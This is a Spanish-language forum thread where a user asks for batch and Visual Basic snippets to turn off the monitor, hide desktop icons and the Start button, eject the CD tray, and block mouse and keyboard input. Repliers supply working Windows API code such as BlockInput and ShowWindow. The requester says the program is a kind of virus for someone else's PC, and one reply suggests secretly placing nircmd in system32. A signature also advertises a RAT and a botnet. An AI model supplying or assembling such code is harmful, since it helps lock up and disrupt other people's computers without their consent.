Hola a todos. Bueno, necesito estos códigos para crear un pequeño programa que igual ni siquiera llego a crear hasta el final porque me está costando bastante, pero de todas formas os pregunto los códigos que quiero saber a ver si me podeis ayudar.

-[1]- El primer código que necesito es uno que, una vez guardado como archivo BAT, lo ejecutes y se active el protector de pantalla o bien se apague la pantalla. Cualquiera de los dos vale.
-[2]- Este código quiero que quite los iconos del escritorio y que quite el botón "Inicio" de la parte inferior izquierda del screen.
-[3]- Ahora quiero uno que bloquee la barra de tareas (incluyendo el botón de inicio).
-[4]- Un código sencillo: al abrir el archivo BAT se abra el CD y otro que se cierre.
-[5]- Bloquear los clics del ratón.
-[6]- Bloquear todas las teclas del teclado.

Bueno, esto es todo. Sé que no pido poco, pero seguro que si sabes mucho de batch no te costará nada ayudarme. Gracias por atender mi pregunta.
Imagen
te lo puedo decir todo pero en vb, ademas en batch no puedes hacer eso.. tienes que añadir bastante code de vbs

salu2
m3m0´s - RAT....(100%) --> publicado ;)
m3m0´s Botnet... (100%)
MicroAttackeR escribió:Bueno, yo lo que quiero es que al darle doble clic, es decir, al ejecutarse, pase lo que yo quiero que ya dije arriva. ¿Eso funcionaría en VB?
ajam ..pero en ves de bat en .exe
http://www.freundt-esta-aburrido.blogspot.com
[1] apagar monitor

Código: Seleccionar todo

Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long

Const WM_SYSCOMMAND = &H112&

Const SC_MONITORPOWER = &HF170&

Private Sub Form_Load()

SendMessage Me.hwnd, WM_SYSCOMMAND, SC_MONITORPOWER, ByVal 2&

End Sub
[2] kitar iconos y desaparcer inicio

Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function GetWindowRect Lib "user32" (ByVal hwnd As Long, lpRect As RECT) As Long
Private Declare Function CreateWindowEx Lib "user32" Alias "CreateWindowExA" (ByVal dwExStyle As Long, ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hWndParent As Long, ByValhMenu As Long, ByVal hInstance As Long, lpParam As Any) As Long
Private Declare Function DestroyWindow Lib "user32" (ByVal hwnd As Long) As Long

Const SW_SHOW = 5 'MUESTRA
Const SW_HIDE = 0 'OCULTA
Const WS_CHILD = &H40000000
Const WM_LBUTTONDOWN = &H201
Const WM_LBUTTONUP = &H202
Const SW_NORMAL = 1

Private Type RECT
Left As Long
Top As Long
Right As Long
Bottom As Long
End Type

Dim tWnd As Long, bWnd As Long, ncWnd As Long

Private Sub Form_Load()
Dim Ret As Long
On Error Resume Next

'oculta el boton inicio
Ret = FindWindowEx(0&, 0&, "Progman", vbNullString)
ShowWindow Ret, SW_HIDE ' para mostrarlo seria SW_SHOW ;)

'oculta los iconos
Dim R As RECT
tWnd = FindWindow("Shell_TrayWnd", vbNullString)
bWnd = FindWindowEx(tWnd, ByVal 0&, "BUTTON", vbNullString)

GetWindowRect bWnd, R
ShowWindow ncWnd, SW_NORMAL
ShowWindow bWnd, SW_HIDE ' para mostrarlo seria SW_SHOW ;)

End Sub
[3] no lo se pero alomejor te interesa bloquiar el mouse y teclado :P

en un modulo:
Public Declare Function BlockInput Lib "user32" _
(ByVal fBlock As Long) As Long

Private Sub Form_Load()
BlockInput True ' false para desbloquear 
End Sub

[4] abrir y cerrar cd

en un modulo:
Public Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" ( _
ByVal lpstrCommand As String, _
ByVal lpstrReturnString As String, _
ByVal uReturnLength As Long, _
ByVal hwndCallback As Long) As Long

Private Sub Form_Load()
'para abrir
Call mciSendString("Set CDAudio Door Open Wait", 0&, 0&, 0&) ' llama a la funciónAPI para abrir la bandeja de CD
'para cerrar
Call mciSendString("Set CDAudio Door closed Wait", 0&, 0&, 0&) ' llama a la funciónAPI para cerrar la bandeja de CD
'puedes poner un timer para que se cierre y se abra ;)
End Sub

[5] para ocultar el mouse

Declare Function ShowCursor Lib "user32" _
(ByVal bShow As Long) As Long

Private Sub Form_Load()
ShowCursor False ' ya saves true para ponerlo
End Sub

[6] la que te di en la tres bloquea todas la teclas de teclado y el mouse =)

saludos!!
http://www.freundt-esta-aburrido.blogspot.com
¿Y para anular las cosas (encender monitar, que ya lo enciende él al mover el ratón o pulsar teclas, pero bueno; hacer aparecer los iconos...)?
Imagen
en batch si se puede apagar el monitor con nircmd con el siguiente codigo

@echo off
nircmd monitor off 
exit
de esta formaaunque le de a una tecla no puede encender la pantalla el unico incombeniente es que en pc al que e mandamos el "virus" que me imagino que es para eso , tiene que tener nircmd pero puedes poner que lo extraiga al principio del exe a system32 o a windows que es normal que este por hay
Es para una especie de virus, y el otro PC seguramente no tenga el "nircmd" ese, así que prefiero los de VB, pero necesito eso que dije, que se pueda dejar todo como al principio.
Imagen
mmmmmmm ok pero el nircmd se puede añadir a jtu exe principal ya que apenas pesa es un exe pero si me entero de alguna forma de kitar todo lo que pones en vb pues te abiso
mejor hacelo todo en batch
Imagen

es mucho más fácil, más rápido, no pesa nada y no se necesita nada de code adicional en vbs

Salu2
Todos somos muy ignorantes, lo que ocurre es que no todos ignoramos lo mismo.-Albert Einstein
No nos atrevemos a muchas cosas porque son difíciles, pero son difíciles porque no nos atrevemos a hacerlas.-Séneca

http://iFile.it/ 100% FREE /Reanuda descargas/Usa aceleradores de descargas/ No límita hora ni país / Dos descargas paralelas/NO banners/No Adwares
Basta de filehosts restrictivos: NO a rapidshare, NO a megaupload, NO a multiupload,... decantemonos x FileHostings que den más beneficios!!!
Pues dime tú el code.... ¬¬

Nota: al-hacker, muchas gracias. Estoy probando tus codes y el de apagar la pantalla no me funcionó, pero el segundo si. :D Ahora estoy mirando los demás. Si puedes, modifica el primero.

Modificado: probé todas y muchas gracias, todas funcionan bien excepto algunas. La primera, la de apagar la pantalla no funcionó; la de bloquear teclado y ratón está bien, pero no bloquea la combinación de teclas Ctrl + Alt + Supr; la tercera y última, la de esconder el ratón no funciona.
Imagen
Responder

Volver a “Fuentes”